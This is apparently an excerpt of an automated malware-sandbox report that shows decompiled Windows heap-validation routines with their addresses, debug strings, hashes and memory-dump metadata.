							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0107B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0112FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0107B150();
						} else {
							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0107B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0107B150();
									} else {
										E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0107B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0112FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0107B150();
										} else {
											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E010CD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0113A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0109E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0113A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0109E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0109A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0109A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0109BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E011223E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01071F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                            0x01134af7
                                                                            0x01134afb
                                                                            0x01134afd
                                                                            0x01134b01
                                                                            0x01134b03
                                                                            0x01134b08
                                                                            0x01134b0a
                                                                            0x01134b0f
                                                                            0x01134eb5
                                                                            0x01134eb5
                                                                            0x01134ebb
                                                                            0x011350d5
                                                                            0x011350d8
                                                                            0x01134ff6
                                                                            0x00000000
                                                                            0x01134ff6
                                                                            0x011350de
                                                                            0x011350e4
                                                                            0x011350e8
                                                                            0x01135107
                                                                            0x0113510c
                                                                            0x011350ea
                                                                            0x011350ff
                                                                            0x01135104
                                                                            0x01135112
                                                                            0x01135115
                                                                            0x01135118
                                                                            0x01135119
                                                                            0x011350cb
                                                                            0x011350cb
                                                                            0x011350af
                                                                            0x00000000
                                                                            0x011350af
                                                                            0x01134ecb
                                                                            0x011350b6
                                                                            0x011350bb
                                                                            0x01134ed1
                                                                            0x01134ee6
                                                                            0x01134eeb
                                                                            0x011350c1
                                                                            0x011350c2
                                                                            0x011350c5
                                                                            0x011350c6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134b15
                                                                            0x01134b15
                                                                            0x01134b1c
                                                                            0x01134b1e
                                                                            0x01134b23
                                                                            0x01134b27
                                                                            0x01134b33
                                                                            0x01134b38
                                                                            0x01134b3a
                                                                            0x01134b3c
                                                                            0x01134b41
                                                                            0x01134b41
                                                                            0x01134b3a
                                                                            0x01134b52
                                                                            0x01135045
                                                                            0x0113504b
                                                                            0x0113504f
                                                                            0x0113506e
                                                                            0x01135073
                                                                            0x01135051
                                                                            0x01135066
                                                                            0x0113506b
                                                                            0x01135083
                                                                            0x01135088
                                                                            0x01135088
                                                                            0x0113508a
                                                                            0x01135091
                                                                            0x01135099
                                                                            0x01135099
                                                                            0x0113509d
                                                                            0x011350a7
                                                                            0x011350ad
                                                                            0x011350ad
                                                                            0x011350ad
                                                                            0x00000000
                                                                            0x0113509d
                                                                            0x01134b58
                                                                            0x01134b5b
                                                                            0x01134b5e
                                                                            0x01134b63
                                                                            0x01134b66
                                                                            0x01134b69
                                                                            0x01134b6f
                                                                            0x01134be4
                                                                            0x01134bf0
                                                                            0x01134bf2
                                                                            0x01134bf5
                                                                            0x01134dc3
                                                                            0x01134dc6
                                                                            0x01134dc9
                                                                            0x01134dce
                                                                            0x01134dce
                                                                            0x01134dd0
                                                                            0x01134dd0
                                                                            0x01134dd5
                                                                            0x01134def
                                                                            0x01134dd7
                                                                            0x01134de7
                                                                            0x01134de7
                                                                            0x01134df3
                                                                            0x01135001
                                                                            0x01135007
                                                                            0x0113500b
                                                                            0x0113502a
                                                                            0x0113502f
                                                                            0x0113500d
                                                                            0x01135022
                                                                            0x01135027
                                                                            0x01135039
                                                                            0x0113503a
                                                                            0x0113503b
                                                                            0x00000000
                                                                            0x01134df9
                                                                            0x01134dfd
                                                                            0x01134e90
                                                                            0x01134e94
                                                                            0x01134e9e
                                                                            0x01134ea4
                                                                            0x01134ea4
                                                                            0x01134ea4
                                                                            0x01134ea6
                                                                            0x01134ea6
                                                                            0x00000000
                                                                            0x01134ea6
                                                                            0x01134e03
                                                                            0x01134e08
                                                                            0x01134f88
                                                                            0x01134f92
                                                                            0x01134f99
                                                                            0x01134f9c
                                                                            0x01134fe0
                                                                            0x01134fe4
                                                                            0x01134fee
                                                                            0x01134ff4
                                                                            0x01134ff4
                                                                            0x01134ff4
                                                                            0x00000000
                                                                            0x01134fe4
                                                                            0x01134f9e
                                                                            0x01134fa4
                                                                            0x01134fa8
                                                                            0x01134fc7
                                                                            0x01134fcc
                                                                            0x01134faa
                                                                            0x01134fbf
                                                                            0x01134fc4
                                                                            0x01134fd2
                                                                            0x01134fd5
                                                                            0x01134fd6
                                                                            0x01134f34
                                                                            0x01134f34
                                                                            0x00000000
                                                                            0x01134f39
                                                                            0x01134e0e
                                                                            0x01134e14
                                                                            0x01134e1b
                                                                            0x01134e25
                                                                            0x01134e2b
                                                                            0x01134e2b
                                                                            0x01134e33
                                                                            0x01134e38
                                                                            0x01134e8a
                                                                            0x01134e8a
                                                                            0x00000000
                                                                            0x01134e3a
                                                                            0x01134e3e
                                                                            0x01134e43
                                                                            0x01134e47
                                                                            0x01134e53
                                                                            0x01134e58
                                                                            0x01134e5a
                                                                            0x01134e5c
                                                                            0x01134e61
                                                                            0x01134e61
                                                                            0x01134e5a
                                                                            0x01134e6e
                                                                            0x01134f41
                                                                            0x01134f47
                                                                            0x01134f4b
                                                                            0x01134f6a
                                                                            0x01134f6f
                                                                            0x01134f4d
                                                                            0x01134f62
                                                                            0x01134f67
                                                                            0x01134f7f
                                                                            0x01134f80
                                                                            0x01134f81
                                                                            0x00000000
                                                                            0x01134e74
                                                                            0x01134e78
                                                                            0x01134e82
                                                                            0x01134e88
                                                                            0x01134e88
                                                                            0x00000000
                                                                            0x01134e78
                                                                            0x01134e6e
                                                                            0x01134e38
                                                                            0x01134df3
                                                                            0x01134bfe
                                                                            0x01134c01
                                                                            0x01134c04
                                                                            0x01134c07
                                                                            0x01134c09
                                                                            0x01134c0c
                                                                            0x01134c0e
                                                                            0x01134c0e
                                                                            0x01134c11
                                                                            0x01134c11
                                                                            0x01134c0c
                                                                            0x01134c14
                                                                            0x01134c17
                                                                            0x01134dae
                                                                            0x01134db2
                                                                            0x01134db7
                                                                            0x01134dba
                                                                            0x01134dbd
                                                                            0x01134ef1
                                                                            0x01134ef7
                                                                            0x01134efb
                                                                            0x01134f1a
                                                                            0x01134f1f
                                                                            0x01134efd
                                                                            0x01134f12
                                                                            0x01134f17
                                                                            0x01134f2b
                                                                            0x01134f2b
                                                                            0x01134f2d
                                                                            0x01134f2e
                                                                            0x01134f2f
                                                                            0x00000000
                                                                            0x01134f2f
                                                                            0x00000000
                                                                            0x01134c1d
                                                                            0x01134c1d
                                                                            0x01134c20
                                                                            0x01134c23
                                                                            0x01134c26
                                                                            0x01134c29
                                                                            0x01134c2c
                                                                            0x01134c2e
                                                                            0x01134d91
                                                                            0x01134d91
                                                                            0x01134d92
                                                                            0x01134d97
                                                                            0x01134d9e
                                                                            0x00000000
                                                                            0x01134d9e
                                                                            0x01134c34
                                                                            0x01134c37
                                                                            0x01134c39
                                                                            0x01134c3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c45
                                                                            0x01134c48
                                                                            0x01134c4e
                                                                            0x01134c50
                                                                            0x01134c78
                                                                            0x01134c78
                                                                            0x01134c7b
                                                                            0x01134c7d
                                                                            0x01134c80
                                                                            0x01134c84
                                                                            0x01134cad
                                                                            0x01134cad
                                                                            0x01134cb0
                                                                            0x01134cb8
                                                                            0x01134cbb
                                                                            0x01134cbe
                                                                            0x01134cc1
                                                                            0x01134cc7
                                                                            0x01134cdc
                                                                            0x01134cc9
                                                                            0x01134cd2
                                                                            0x01134cd4
                                                                            0x01134cd4
                                                                            0x01134cde
                                                                            0x01134ce0
                                                                            0x01134d13
                                                                            0x01134d13
                                                                            0x01134d16
                                                                            0x01134d18
                                                                            0x01134d29
                                                                            0x01134d2a
                                                                            0x01134d2c
                                                                            0x01134d34
                                                                            0x01134d1a
                                                                            0x01134d1a
                                                                            0x01134d1a
                                                                            0x01134d1d
                                                                            0x01134d1f
                                                                            0x01134d22
                                                                            0x01134d24
                                                                            0x01134d24
                                                                            0x01134d3c
                                                                            0x01134d3f
                                                                            0x01134d45
                                                                            0x01134d47
                                                                            0x01134d6c
                                                                            0x01134d6c
                                                                            0x01134d70
                                                                            0x01134d7e
                                                                            0x01134d84
                                                                            0x01134d84
                                                                            0x00000000
                                                                            0x01134d49
                                                                            0x01134d49
                                                                            0x01134d56
                                                                            0x01134d56
                                                                            0x01134d59
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d4e
                                                                            0x01134d50
                                                                            0x01134d52
                                                                            0x01134d8e
                                                                            0x01134d5d
                                                                            0x01134d5f
                                                                            0x01134d67
                                                                            0x00000000
                                                                            0x01134d67
                                                                            0x01134d54
                                                                            0x01134d54
                                                                            0x01134d5b
                                                                            0x00000000
                                                                            0x01134d5b
                                                                            0x01134ce2
                                                                            0x01134ce2
                                                                            0x01134ce5
                                                                            0x01134ce5
                                                                            0x01134ce7
                                                                            0x01134cfb
                                                                            0x01134ce9
                                                                            0x01134ce9
                                                                            0x01134cec
                                                                            0x01134cef
                                                                            0x01134cf1
                                                                            0x01134cf3
                                                                            0x01134cf3
                                                                            0x01134cf3
                                                                            0x01134cf6
                                                                            0x01134cf6
                                                                            0x01134d02
                                                                            0x01134d05
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d07
                                                                            0x01134d0f
                                                                            0x01134d11
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d11
                                                                            0x00000000
                                                                            0x01134ce5
                                                                            0x01134ce0
                                                                            0x01134c8a
                                                                            0x01134c8f
                                                                            0x01134c91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c9d
                                                                            0x00000000
                                                                            0x01134c9d
                                                                            0x01134c52
                                                                            0x01134c5f
                                                                            0x01134c5f
                                                                            0x01134c62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c57
                                                                            0x01134c59
                                                                            0x01134c5b
                                                                            0x01134caa
                                                                            0x01134c66
                                                                            0x01134c68
                                                                            0x01134c70
                                                                            0x01134c75
                                                                            0x00000000
                                                                            0x01134c75
                                                                            0x01134c5d
                                                                            0x01134c5d
                                                                            0x01134c64
                                                                            0x00000000
                                                                            0x01134c64
                                                                            0x01134c17
                                                                            0x01134b75
                                                                            0x01134bc4
                                                                            0x01134bc8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bd9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134b77
                                                                            0x01134b7a
                                                                            0x01134b8c
                                                                            0x01134b7c
                                                                            0x01134b7e
                                                                            0x01134b83
                                                                            0x01134b86
                                                                            0x01134b86
                                                                            0x01134b90
                                                                            0x01134b93
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134b95
                                                                            0x01134bab
                                                                            0x01134bb0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bb2
                                                                            0x01134bb9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bbb
                                                                            0x01134bbe
                                                                            0x01134bc1
                                                                            0x01134bc1
                                                                            0x00000000
                                                                            0x01134bc1
                                                                            0x01134b97
                                                                            0x01134ba4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134ba6
                                                                            0x00000000
                                                                            0x01134ba6
                                                                            0x01134ea9
                                                                            0x01134ea9
                                                                            0x01134eb2
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                            • API String ID: 0-3591852110
                                                                            • Opcode ID: 3838a9141e7ad55a053035975ede10b103acf7c1b0dd1353f5a2687e576ac016
                                                                            • Instruction ID: e269d1bea590db25671e69a822438f557c5bcb67a231f22c6dfdc1aeeec821e8
                                                                            • Opcode Fuzzy Hash: 3838a9141e7ad55a053035975ede10b103acf7c1b0dd1353f5a2687e576ac016
                                                                            • Instruction Fuzzy Hash: 6A12E230600642DFEB2DCF29C494BBABBF5FF88714F198459E4868BA45D735E880CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01134496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 56%
                                                                            			E01134496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E011349A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1166378 = _t267;
						asm("int3");
						 *0x1166378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E010A174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0107B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0107B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1166350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E010B9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
